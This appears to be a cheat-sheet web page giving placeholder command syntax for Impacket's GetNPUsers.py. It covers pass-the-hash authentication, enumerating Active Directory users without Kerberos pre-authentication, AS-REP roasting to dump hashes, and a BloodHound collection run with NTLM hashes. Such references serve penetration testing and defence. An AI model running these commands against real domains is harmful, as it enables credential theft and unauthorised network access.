getnpusers.py
Verified for current stable LTS
Getnpusers.py Command: Pass The Hash Authentication
Use for pass the hash authentication with Getnpusers.py. Exact CLI syntax to pass the hash authentication using Getnpusers.py.
When to use this: Use for pass the hash authentication with Getnpusers.py.
Command Syntax
GetNPUsers.py <domain>/<username> -hashes <LM_Hash>:<NT_Hash> -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> GetNPUsers.py <domain>/<username> -hashes <LM_Hash>:<NT_Hash> -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> Command Breakdown
-hashes- Command Option
- Tool-specific option used by this command invocation.
-usersfile- Command Option
- Tool-specific option used by this command invocation.
-dc-ip- Command Option
- Tool-specific option used by this command invocation.
FAQ
Purpose: Exact syntax to pass the hash authentication using Getnpusers.py.
Test path: Replace placeholders and run destructive commands in a disposable workspace first.
Flag behavior: Tool version, platform, and shell can change behavior.
Improve This Command
Suggest a correction, safer default, or version-specific note for this entry.
Related Operations
Getnpusers.py Command: Enumerate Users With Pre Auth Disabled
GetNPUsers.py <domain>/ -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> -no-pass Getnpusers.py Command: As Rep Roasting And Dump Hashes GetNPUsers.py <domain>/ -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> -no-pass -request Getnpusers.py Command: Authenticate With Credentials GetNPUsers.py <domain>/<username>:<password> -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> Getnpusers.py Command: Save Output To File GetNPUsers.py <domain>/ -usersfile <path/to/userslist> -dc-ip <domain_controller_ip> -request > <path/to/output.txt> Bloodhound Python Command: Authenticate Using Ntlm Hashes bloodhound-python --collectionmethod <All> --username <username> --hashes {LM:NTLM} --domain <domain>